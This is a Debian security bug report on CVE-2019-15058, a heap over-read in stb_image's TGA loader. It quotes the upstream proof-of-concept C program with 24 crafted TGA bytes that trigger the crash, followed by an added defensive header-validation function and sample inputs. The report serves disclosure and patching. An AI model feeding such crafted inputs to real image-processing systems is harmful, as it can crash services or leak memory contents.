Source: libstb
Version: 0.0~git20190617.5.c72a95d-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/nothings/stb/issues/790

Hi,

The following vulnerability was published for libstb.

CVE-2019-15058[0]:
| stb_image.h (aka the stb image loader) 2.23 has a heap-based buffer
| over-read in stbi__tga_load, leading to Information Disclosure or
| Denial of Service.

To reproduce the issue, the upstream issue provides a PoC:

|#define STBI_WINDOWS_UTF8
|#define STB_IMAGE_WRITE_IMPLEMENTATION
|#include "stb_image_write.h"
|#define STB_IMAGE_IMPLEMENTATION
|#include "stb_image.h"
|#define STB_DEFINE
|#include "stb.h"
|#include <stdio.h>
|#include <stdlib.h>
|/* crafted 24-byte TGA input that triggers the over-read in stbi__tga_load */
|unsigned char data[] =
|{
|  0xAF, 0x01, 0x09, 0x00, 0x00, 0x00, 0x00, 0x10, 0x14, 0x0A,
|  0xAF, 0x00, 0xEF, 0xEF, 0xEF, 0x11, 0x10, 0xEF, 0xEB, 0xF5,
|  0x50, 0xFE, 0xFE, 0x09
|};
|int main(int argc, char **argv)
|{
|    int x, y, n;
|    /* decode from memory, requesting 4 channels; the crash happens inside */
|    stbi_load_from_memory(data, sizeof(data), &x, &y, &n, 4);
|    return 0;
|}

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-15058
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15058
[1] https://github.com/nothings/stb/issues/790

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
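A defender-side pre-decode check for inputs like the PoC above, added here as an example; it is not part of this report, of the upstream issue, or of stb. The function check_tga_header and the two small valid samples are constructed for the example; it parses the 18-byte TGA header and rejects buffers whose header announces more bytes than are present or whose colour-map fields contradict each other, so the 24 PoC bytes never reach stbi_load_from_memory.

```c
#include <stddef.h>
#include <stdint.h>

#define TGA_HDR_LEN 18

static unsigned le16(const unsigned char *p) { return p[0] | (p[1] << 8); }

/* Hypothetical pre-decode check: 1 if the 18-byte TGA header is
 * self-consistent and the buffer can hold what it announces, else 0.
 * For RLE types the pixel-data size is a lower bound: every packet
 * covers at most 128 pixels and costs at least 1 + bytes-per-pixel. */
int check_tga_header(const unsigned char *buf, size_t len)
{
    if (len < TGA_HDR_LEN) return 0;
    unsigned id_len    = buf[0];          /* PoC: 0xAF = 175 bytes      */
    unsigned cmap_type = buf[1];          /* PoC: 1 = colour map present */
    unsigned img_type  = buf[2];          /* PoC: 9 = RLE colour-mapped  */
    unsigned cmap_len  = le16(buf + 5);   /* PoC: 0 entries             */
    unsigned cmap_bits = buf[7];
    unsigned width     = le16(buf + 12);  /* PoC: 0xEFEF = 61423        */
    unsigned height    = le16(buf + 14);  /* PoC: 0x11EF = 4591         */
    unsigned bpp       = buf[16];
    int colour_mapped  = (img_type == 1 || img_type == 9);
    int rle            = (img_type >= 9 && img_type <= 11);

    if (!(img_type >= 1 && img_type <= 3) && !rle) return 0;
    if (width == 0 || height == 0 || cmap_type > 1) return 0;
    if (bpp != 8 && bpp != 15 && bpp != 16 && bpp != 24 && bpp != 32) return 0;
    /* A colour-mapped image must actually carry a colour map (the PoC does not). */
    if (colour_mapped && (cmap_type != 1 || cmap_len == 0)) return 0;
    if (cmap_type == 1 && cmap_len > 0 &&
        cmap_bits != 15 && cmap_bits != 16 && cmap_bits != 24 && cmap_bits != 32) return 0;

    uint64_t pixels    = (uint64_t)width * height;
    uint64_t pix_bytes = (bpp + 7) / 8;
    uint64_t need = TGA_HDR_LEN + id_len + (uint64_t)cmap_len * ((cmap_bits + 7) / 8);
    need += rle ? ((pixels + 127) / 128) * (1 + pix_bytes) : pixels * pix_bytes;
    return need <= len;
}

/* Constructed inputs: the 24 PoC bytes from the report, a 1x1 uncompressed
 * 24-bit true-colour image, and a 2x1 RLE 24-bit image (one run packet). */
const unsigned char poc_tga[] = {
    0xAF,0x01,0x09,0x00,0x00,0x00,0x00,0x10,0x14,0x0A,0xAF,0x00,
    0xEF,0xEF,0xEF,0x11,0x10,0xEF,0xEB,0xF5,0x50,0xFE,0xFE,0x09 };
const unsigned char tiny_tga[] = { 0,0,2, 0,0,0,0,0, 0,0,0,0, 1,0,1,0, 24,0, 0x10,0x20,0x30 };
const unsigned char rle_tga[]  = { 0,0,10, 0,0,0,0,0, 0,0,0,0, 2,0,1,0, 24,0, 0x81,0x10,0x20,0x30 };
```

The check is a conservative bound, not a full TGA validator: a buffer that passes it can still be malformed, so it complements rather than replaces a patched stb_image.h.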
